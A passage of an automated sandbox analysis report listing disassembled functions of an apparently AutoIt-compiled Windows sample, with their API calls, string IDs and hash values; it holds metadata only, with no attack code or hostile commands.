                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                        • String ID:
                        • API String ID: 4175595110-0
                        • Opcode ID: 572e8cbf11af1cf1e71191c6d386544c824261860cb9bff89341099e84283753
                        • Instruction ID: 27727ebc4f876601d3730d9f69fcb9fab7c42eab1425cf7101314df92cf39213
                        • Opcode Fuzzy Hash: 572e8cbf11af1cf1e71191c6d386544c824261860cb9bff89341099e84283753
                        • Instruction Fuzzy Hash: 9771AB7290025AABDF21CFA5DC48BEEBBBCBF48310F048624F959A6190D770DE55CB60
                        Function 00A0C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A0C4BD
                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00A1CC08,00000000,?,00000000,?,?), ref: 00A0C544
                        • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00A0C5A4
                        • _wcslen.LIBCMT ref: 00A0C5F4
                        • _wcslen.LIBCMT ref: 00A0C66F
                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00A0C6B2
                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00A0C7C1
                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00A0C84D
                        • RegCloseKey.ADVAPI32(?), ref: 00A0C881
                        • RegCloseKey.ADVAPI32(00000000), ref: 00A0C88E
                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00A0C960
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                        • API String ID: 9721498-966354055
                        • Opcode ID: 025418a5cfcc7d3a803b46b9637639d729ec301edcedadb7fa23d4557b2367d9
                        • Instruction ID: e45eb09071f30709efb40719b3c0a06c86315aa6f78e604033a8d5c06f7963c4
                        • Opcode Fuzzy Hash: 025418a5cfcc7d3a803b46b9637639d729ec301edcedadb7fa23d4557b2367d9
                        • Instruction Fuzzy Hash: 501267356042019FDB14EF24D881B2AB7E5FF88724F14895CF89A9B3A2DB31ED45CB91
                        Function 00A1091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                        Download Yara Rule
                        APIs
                        • CharUpperBuffW.USER32(?,?), ref: 00A109C6
                        • _wcslen.LIBCMT ref: 00A10A01
                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A10A54
                        • _wcslen.LIBCMT ref: 00A10A8A
                        • _wcslen.LIBCMT ref: 00A10B06
                        • _wcslen.LIBCMT ref: 00A10B81
                          • Part of subcall function 0099F9F2: _wcslen.LIBCMT ref: 0099F9FD
                          • Part of subcall function 009E2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009E2BFA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _wcslen$MessageSend$BuffCharUpper
                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                        • API String ID: 1103490817-4258414348
                        • Opcode ID: 6e6abbb38cb4eab425f896cf8127245fab8576212d6906c4c7bab7bcfb232752
                        • Instruction ID: 7ce2c8fad4a5ef2bbdb1258ec2058b9431b83d8beb536cc70acc6d8849d3c769
                        • Opcode Fuzzy Hash: 6e6abbb38cb4eab425f896cf8127245fab8576212d6906c4c7bab7bcfb232752
                        • Instruction Fuzzy Hash: 82E1BB352083418FCB14EF24C450EAAB7E1BFD8358B14895CF8969B3A2DB70ED85CB91
                        Function 00A0C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _wcslen$BuffCharUpper
                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                        • API String ID: 1256254125-909552448
                        • Opcode ID: 7257588da850fdc0878d854ea093a23d48ff2e328d66582ade7752b1f12e74c4
                        • Instruction ID: 8e052384f9a40fe6683e7cffeeb1228f9abbbf6c9115c1a3734f4dcc4bf0275d
                        • Opcode Fuzzy Hash: 7257588da850fdc0878d854ea093a23d48ff2e328d66582ade7752b1f12e74c4
                        • Instruction Fuzzy Hash: A471D53260056E8BCB10DF6CE9516BF33A6ABA17B4B650724FC559B2C4E635CD4583A0
                        Function 00A1833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                        Download Yara Rule
                        APIs
                        • _wcslen.LIBCMT ref: 00A1835A
                        • _wcslen.LIBCMT ref: 00A1836E
                        • _wcslen.LIBCMT ref: 00A18391
                        • _wcslen.LIBCMT ref: 00A183B4
                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00A183F2
                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00A1361A,?), ref: 00A1844E
                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A18487
                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00A184CA
                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A18501
                        • FreeLibrary.KERNEL32(?), ref: 00A1850D
                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00A1851D
                        • DestroyIcon.USER32(?), ref: 00A1852C
                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00A18549
                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00A18555
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                        • String ID: .dll$.exe$.icl
                        • API String ID: 799131459-1154884017
                        • Opcode ID: 1c3d55cd37a47116a5177ee320f76d25332e40c8f93a1de51f4df5681aa5f074
                        • Instruction ID: 4117eb2499faf3571e867b393947ba80a27b942f268526ab8970a0668f55abd2
                        • Opcode Fuzzy Hash: 1c3d55cd37a47116a5177ee320f76d25332e40c8f93a1de51f4df5681aa5f074
                        • Instruction Fuzzy Hash: 0B61CF71540215BAEB14DF64CC41BFE77ACFB44B21F108609F815DA1D1DFB8A991CBA0
                        Function 00987778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                        • API String ID: 0-1645009161
                        • Opcode ID: 69c94dd0481c6d781cb402281eb82a1dee4e36702279f1fdc615b371b18c70b3
                        • Instruction ID: f02aeda7d602b4401fdcb4aadeaceaede0cd87cab31cba78eaba70fee5cec0b5
                        • Opcode Fuzzy Hash: 69c94dd0481c6d781cb402281eb82a1dee4e36702279f1fdc615b371b18c70b3
                        • Instruction Fuzzy Hash: ED81F971A48605BBDB11BFA4CC42FAFB7A8BF95300F144424F805AA296EB74D951C7D1
                        Function 009E5A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • LoadIconW.USER32(00000063), ref: 009E5A2E
                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 009E5A40
                        • SetWindowTextW.USER32(?,?), ref: 009E5A57
                        • GetDlgItem.USER32(?,000003EA), ref: 009E5A6C
                        • SetWindowTextW.USER32(00000000,?), ref: 009E5A72
                        • GetDlgItem.USER32(?,000003E9), ref: 009E5A82
                        • SetWindowTextW.USER32(00000000,?), ref: 009E5A88
                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 009E5AA9
                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 009E5AC3
                        • GetWindowRect.USER32(?,?), ref: 009E5ACC
                        • _wcslen.LIBCMT ref: 009E5B33
                        • SetWindowTextW.USER32(?,?), ref: 009E5B6F
                        • GetDesktopWindow.USER32 ref: 009E5B75
                        • GetWindowRect.USER32(00000000), ref: 009E5B7C
                        • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 009E5BD3
                        • GetClientRect.USER32(?,?), ref: 009E5BE0
                        • PostMessageW.USER32(?,00000005,00000000,?), ref: 009E5C05
                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 009E5C2F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                        • String ID:
                        • API String ID: 895679908-0
                        • Opcode ID: df6ca60e63449e9f16512e1a5675848eae6f37ce848e493ad447c8001ccb9405
                        • Instruction ID: c67c96214d949c7c6015cdd033d655eac907bfb4a2df55ff2156b530333ac2b9
                        • Opcode Fuzzy Hash: df6ca60e63449e9f16512e1a5675848eae6f37ce848e493ad447c8001ccb9405
                        • Instruction Fuzzy Hash: A3718E31900B49AFDB21DFA9CE85BAEBBF9FF48718F154918E142A25A0D774ED40CB50
                        Function 009A00C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                        Download Yara Rule
                        APIs
                        • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 009A00C6
                          • Part of subcall function 009A00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00A5070C,00000FA0,68A34630,?,?,?,?,009C23B3,000000FF), ref: 009A011C
                          • Part of subcall function 009A00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,009C23B3,000000FF), ref: 009A0127
                          • Part of subcall function 009A00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,009C23B3,000000FF), ref: 009A0138
                          • Part of subcall function 009A00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 009A014E
                          • Part of subcall function 009A00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 009A015C
                          • Part of subcall function 009A00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 009A016A
                          • Part of subcall function 009A00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 009A0195
                          • Part of subcall function 009A00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 009A01A0
                        • ___scrt_fastfail.LIBCMT ref: 009A00E7
                          • Part of subcall function 009A00A3: __onexit.LIBCMT ref: 009A00A9
                        Strings
                        • SleepConditionVariableCS, xrefs: 009A0154
                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 009A0122
                        • WakeAllConditionVariable, xrefs: 009A0162
                        • InitializeConditionVariable, xrefs: 009A0148
                        • kernel32.dll, xrefs: 009A0133
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                        • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                        • API String ID: 66158676-1714406822
                        • Opcode ID: 4f0380e06ca61c6754e6edac9b445a3d41b1725f32950a7939377dbb4339376e
                        • Instruction ID: 41cdbffefcc847631c4562ec357996c57b586aa611f25b9f419cfb9032839962
                        • Opcode Fuzzy Hash: 4f0380e06ca61c6754e6edac9b445a3d41b1725f32950a7939377dbb4339376e
                        • Instruction Fuzzy Hash: D821F932A847517FE7109BE4AC16FE977A8FBC6F65F004629F801E7291DB7498018AD0
                        Function 009E30F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _wcslen
                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                        • API String ID: 176396367-1603158881
                        • Opcode ID: 7aa472b0ef4eca55f71788cb9a5e6129961c9f28dc11187215ea548c16a30574
                        • Instruction ID: 22078005eecb3b474286a7dc5d655f076798ff617b736e431a89561eab68519d
                        • Opcode Fuzzy Hash: 7aa472b0ef4eca55f71788cb9a5e6129961c9f28dc11187215ea548c16a30574
                        • Instruction Fuzzy Hash: 0CE10632A00556ABCB169FB9C449BEEFBB8FF84710F54C529E456E7240EF30AE458790
                        Function 009F44C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                        Download Yara Rule
                        APIs
                        • CharLowerBuffW.USER32(00000000,00000000,00A1CC08), ref: 009F4527
                        • _wcslen.LIBCMT ref: 009F453B
                        • _wcslen.LIBCMT ref: 009F4599
                        • _wcslen.LIBCMT ref: 009F45F4
                        • _wcslen.LIBCMT ref: 009F463F
                        • _wcslen.LIBCMT ref: 009F46A7
                          • Part of subcall function 0099F9F2: _wcslen.LIBCMT ref: 0099F9FD
                        • GetDriveTypeW.KERNEL32(?,00A46BF0,00000061), ref: 009F4743
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _wcslen$BuffCharDriveLowerType
                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                        • API String ID: 2055661098-1000479233
                        • Opcode ID: 8b2af43e23c6e062f65d084b39b380b4a52fd19ba01527750d252dca32364cf9
                        • Instruction ID: 409b180829917c44710f4d8bedfc609d1abff39d6c58e967b30dc192193db04f
                        • Opcode Fuzzy Hash: 8b2af43e23c6e062f65d084b39b380b4a52fd19ba01527750d252dca32364cf9
                        • Instruction Fuzzy Hash: 18B1DF316083069BC710EF28C890A7BB7E9AFE6760F50491DF696C7291E734D945CBA2
                        Function 00A0AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                        Download Yara Rule
                        APIs
                        • _wcslen.LIBCMT ref: 00A0B198
                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A0B1B0
                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A0B1D4
                        • _wcslen.LIBCMT ref: 00A0B200
                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A0B214
                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A0B236
                        • _wcslen.LIBCMT ref: 00A0B332
                          • Part of subcall function 009F05A7: GetStdHandle.KERNEL32(000000F6), ref: 009F05C6
                        • _wcslen.LIBCMT ref: 00A0B34B
                        • _wcslen.LIBCMT ref: 00A0B366
                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A0B3B6
                        • GetLastError.KERNEL32(00000000), ref: 00A0B407
                        • CloseHandle.KERNEL32(?), ref: 00A0B439
                        • CloseHandle.KERNEL32(00000000), ref: 00A0B44A
                        • CloseHandle.KERNEL32(00000000), ref: 00A0B45C
                        • CloseHandle.KERNEL32(00000000), ref: 00A0B46E
                        • CloseHandle.KERNEL32(?), ref: 00A0B4E3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                        • String ID:
                        • API String ID: 2178637699-0
                        • Opcode ID: 4ce6657858d97311b7ebcb3521b422d70566bc7a33bdf635d6bb36e7d4a81743
                        • Instruction ID: 8d177aff2849a32c445e03fc5132898710a54f0871d7ed42cb926a1bf1ac2297
                        • Opcode Fuzzy Hash: 4ce6657858d97311b7ebcb3521b422d70566bc7a33bdf635d6bb36e7d4a81743
                        • Instruction Fuzzy Hash: FBF19A316183449FCB14EF24D991B6EBBE5AFC5710F18855DF8998B2A2DB31EC40CB62
                        Function 0098326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetMenuItemCount.USER32(00A51990), ref: 009C2F8D
                        • GetMenuItemCount.USER32(00A51990), ref: 009C303D
                        • GetCursorPos.USER32(?), ref: 009C3081
                        • SetForegroundWindow.USER32(00000000), ref: 009C308A
                        • TrackPopupMenuEx.USER32(00A51990,00000000,?,00000000,00000000,00000000), ref: 009C309D
                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 009C30A9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                        • String ID: 0
                        • API String ID: 36266755-4108050209
                        • Opcode ID: a5a92d7d07ca1b4312323f3a6e51f94557e9c3f16375a5baf463f081bdd996fd
                        • Instruction ID: 6161d4370985228b5561f781d922e3dcfeebe8365610b9675e4eab19a272cfbe
                        • Opcode Fuzzy Hash: a5a92d7d07ca1b4312323f3a6e51f94557e9c3f16375a5baf463f081bdd996fd
                        • Instruction Fuzzy Hash: F0714D31A44205BEEB21DF69CC49FAABF69FF05774F20821AF5246A1D0C7B5AD10C791
                        Function 00A16CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                        Download Yara Rule
                        APIs
                        • DestroyWindow.USER32(?,?), ref: 00A16DEB
                          • Part of subcall function 00986B57: _wcslen.LIBCMT ref: 00986B6A
                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00A16E5F
                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00A16E81
                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A16E94
                        • DestroyWindow.USER32(?), ref: 00A16EB5
                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00980000,00000000), ref: 00A16EE4
                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A16EFD
                        • GetDesktopWindow.USER32 ref: 00A16F16
                        • GetWindowRect.USER32(00000000), ref: 00A16F1D
                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A16F35
                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00A16F4D
                          • Part of subcall function 00999944: GetWindowLongW.USER32(?,000000EB), ref: 00999952
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                        • String ID: 0$tooltips_class32
                        • API String ID: 2429346358-3619404913
                        • Opcode ID: 77b03485e28f0dec36bce38de1bb935b2eaaed355189c874dbf696518ef460e4
                        • Instruction ID: e534ec83fb99963026870509a5ccf30b2a109850392f5f01cf96a86131442da1
                        • Opcode Fuzzy Hash: 77b03485e28f0dec36bce38de1bb935b2eaaed355189c874dbf696518ef460e4
                        • Instruction Fuzzy Hash: 34716674244340AFDB21CF68D848BBABBE9FB88314F04491DF999C72A1C774A946CB11
                        Function 00A1911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00999BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00999BB2
                        • DragQueryPoint.SHELL32(?,?), ref: 00A19147
                          • Part of subcall function 00A17674: ClientToScreen.USER32(?,?), ref: 00A1769A
                          • Part of subcall function 00A17674: GetWindowRect.USER32(?,?), ref: 00A17710
                          • Part of subcall function 00A17674: PtInRect.USER32(?,?,00A18B89), ref: 00A17720
                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00A191B0
                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00A191BB
                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00A191DE
                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00A19225
                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00A1923E
                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00A19255
                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00A19277
                        • DragFinish.SHELL32(?), ref: 00A1927E
                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00A19371
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
